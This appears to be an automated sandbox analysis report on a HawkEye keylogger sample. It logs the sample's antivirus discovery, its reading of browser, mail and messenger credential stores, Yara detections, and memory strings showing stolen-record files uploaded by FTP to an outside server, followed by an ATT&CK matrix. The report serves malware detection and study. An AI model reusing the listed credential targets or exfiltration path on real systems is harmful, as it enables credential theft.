              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Users\user\Desktop\Vkdr225E85.exe VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_0041604B GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_0040724C memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00406278 GetVersionExA,
              Source: C:\Users\user\Desktop\Vkdr225E85.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: Vkdr225E85.exe, 00000004.00000002.513989672.0000000007887000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\Vkdr225E85.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
              Source: C:\Users\user\Desktop\Vkdr225E85.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

              Stealing of Sensitive Information:

              barindex
              Yara detected HawkEye KeyloggerShow sources
              Source: Yara matchFile source: 00000004.00000002.502038195.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.258840939.0000000003F89000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.506439148.0000000003061000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Vkdr225E85.exe PID: 6504, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Vkdr225E85.exe PID: 6712, type: MEMORY
              Source: Yara matchFile source: 1.2.Vkdr225E85.exe.43cc7f0.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.Vkdr225E85.exe.45fa72.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.Vkdr225E85.exe.408208.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.Vkdr225E85.exe.409c0d.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.Vkdr225E85.exe.4220570.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.Vkdr225E85.exe.43cc7f0.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.Vkdr225E85.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.Vkdr225E85.exe.402c830.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.Vkdr225E85.exe.308b314.5.raw.unpack, type: UNPACKEDPE
              Yara detected MailPassViewShow sources
              Source: Yara matchFile source: 00000004.00000002.509945562.0000000004061000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.276981513.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.502038195.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.258840939.0000000003F89000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 7132, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Vkdr225E85.exe PID: 6504, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Vkdr225E85.exe PID: 6712, type: MEMORY
              Source: Yara matchFile source: 4.2.Vkdr225E85.exe.4069930.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.Vkdr225E85.exe.45fa72.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.Vkdr225E85.exe.43cc7f0.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.Vkdr225E85.exe.45fa72.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.Vkdr225E85.exe.408208.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.Vkdr225E85.exe.4069930.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.Vkdr225E85.exe.409c0d.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.Vkdr225E85.exe.4220570.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.Vkdr225E85.exe.43cc7f0.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.Vkdr225E85.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.Vkdr225E85.exe.402c830.3.raw.unpack, type: UNPACKEDPE
              Tries to harvest and steal browser information (history, passwords, etc)Show sources
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Tries to steal Instant Messenger accounts or passwordsShow sources
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
              Tries to steal Mail credentials (via file access)Show sources
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
              Tries to steal Mail credentials (via file registry)Show sources
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: ESMTPPassword
              Yara detected WebBrowserPassView password recovery toolShow sources
              Source: Yara matchFile source: 00000004.00000002.509945562.0000000004061000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.502038195.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.282385616.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.258840939.0000000003F89000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 7140, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Vkdr225E85.exe PID: 6504, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Vkdr225E85.exe PID: 6712, type: MEMORY
              Source: Yara matchFile source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.Vkdr225E85.exe.43cc7f0.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.Vkdr225E85.exe.4081b50.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.Vkdr225E85.exe.409c0d.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.Vkdr225E85.exe.4081b50.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.Vkdr225E85.exe.408208.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.Vkdr225E85.exe.4069930.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.Vkdr225E85.exe.409c0d.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.Vkdr225E85.exe.4220570.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.Vkdr225E85.exe.43cc7f0.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.Vkdr225E85.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.Vkdr225E85.exe.402c830.3.raw.unpack, type: UNPACKEDPE

              Remote Access Functionality:

              barindex
              Detected HawkEye RatShow sources
              Source: Vkdr225E85.exe, 00000001.00000002.258840939.0000000003F89000.00000004.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
              Source: Vkdr225E85.exe, 00000001.00000002.258840939.0000000003F89000.00000004.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
              Source: Vkdr225E85.exe, 00000001.00000002.258840939.0000000003F89000.00000004.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
              Source: Vkdr225E85.exe, 00000001.00000002.258840939.0000000003F89000.00000004.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
              Source: Vkdr225E85.exe, 00000004.00000002.506439148.0000000003061000.00000004.00000001.sdmpString found in binary or memory: HawkEyeKeylogger
              Source: Vkdr225E85.exe, 00000004.00000002.506439148.0000000003061000.00000004.00000001.sdmpString found in binary or memory: l&HawkEye_Keylogger_Execution_Confirmed_
              Source: Vkdr225E85.exe, 00000004.00000002.506439148.0000000003061000.00000004.00000001.sdmpString found in binary or memory: l"HawkEye_Keylogger_Stealer_Records_
              Source: Vkdr225E85.exe, 00000004.00000002.509838263.000000000356F000.00000004.00000001.sdmpString found in binary or memory: lBHawkEye_Keylogger_Stealer_Records_414408 2.28.2021 10:13:45 AM.txtP
              Source: Vkdr225E85.exe, 00000004.00000002.509838263.000000000356F000.00000004.00000001.sdmpString found in binary or memory: lISTOR HawkEye_Keylogger_Stealer_Records_414408 2.28.2021 10:13:45 AM.txt
              Source: Vkdr225E85.exe, 00000004.00000002.509838263.000000000356F000.00000004.00000001.sdmpString found in binary or memory: STOR HawkEye_Keylogger_Stealer_Records_414408 2.28.2021 10:13:45 AM.txt
              Source: Vkdr225E85.exe, 00000004.00000003.319554425.00000000078B8000.00000004.00000001.sdmpString found in binary or memory: ftp.triplelink.co.thDD/HawkEye_Keylogger_Stealer_Records_414408 2.28.2021 10:13:45 AM.txt
              Source: Vkdr225E85.exe, 00000004.00000002.502038195.0000000000402000.00000040.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
              Source: Vkdr225E85.exe, 00000004.00000002.502038195.0000000000402000.00000040.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
              Source: Vkdr225E85.exe, 00000004.00000002.502038195.0000000000402000.00000040.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
              Source: Vkdr225E85.exe, 00000004.00000002.502038195.0000000000402000.00000040.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
              Source: Vkdr225E85.exe, 00000004.00000002.509801613.0000000003563000.00000004.00000001.sdmpString found in binary or memory: lBHawkEye_Keylogger_Stealer_Records_414408 2.28.2021 10:13:45 AM.txt
              Source: Vkdr225E85.exe, 00000004.00000002.509801613.0000000003563000.00000004.00000001.sdmpString found in binary or memory: l]ftp://ftp.triplelink.co.th/HawkEye_Keylogger_Stealer_Records_414408 2.28.2021 10:13:45 AM.txt
              Source: Vkdr225E85.exe, 00000004.00000002.509801613.0000000003563000.00000004.00000001.sdmpString found in binary or memory: ftp://ftp.triplelink.co.th/HawkEye_Keylogger_Stealer_Records_414408%202.28.2021%2010:13:45%20AM.txt
              Source: Vkdr225E85.exe, 00000004.00000002.509801613.0000000003563000.00000004.00000001.sdmpString found in binary or memory: lcftp://ftp.triplelink.co.th/HawkEye_Keylogger_Stealer_Records_414408%202.28.2021%2010:13:45%20AM.txt
              Yara detected HawkEye KeyloggerShow sources
              Source: Yara matchFile source: 00000004.00000002.502038195.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.258840939.0000000003F89000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.506439148.0000000003061000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Vkdr225E85.exe PID: 6504, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Vkdr225E85.exe PID: 6712, type: MEMORY
              Source: Yara matchFile source: 1.2.Vkdr225E85.exe.43cc7f0.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.Vkdr225E85.exe.45fa72.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.Vkdr225E85.exe.408208.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.Vkdr225E85.exe.409c0d.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.Vkdr225E85.exe.4220570.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.Vkdr225E85.exe.43cc7f0.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.Vkdr225E85.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.Vkdr225E85.exe.402c830.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.Vkdr225E85.exe.308b314.5.raw.unpack, type: UNPACKEDPE

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Replication Through Removable Media1Windows Management Instrumentation1Application Shimming1Application Shimming1Disable or Modify Tools1OS Credential Dumping1System Time Discovery1Replication Through Removable Media1Archive Collected Data11Exfiltration Over Alternative Protocol1Encrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsNative API11Boot or Logon Initialization ScriptsProcess Injection312Deobfuscate/Decode Files or Information11Input Capture1Peripheral Device Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsShared Modules1Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information41Credentials in Registry2Account Discovery1SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationRemote Access Software1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing13Credentials In Files1File and Directory Discovery1Distributed Component Object ModelInput Capture1Scheduled TransferNon-Application Layer Protocol1SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsSystem Information Discovery18SSHClipboard Data1Data Transfer Size LimitsApplication Layer Protocol11Manipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion2Cached Domain CredentialsQuery Registry1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection312DCSyncSecurity Software Discovery131Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobHidden Files and Directories1Proc FilesystemVirtualization/Sandbox Evasion2Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowProcess Discovery4Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
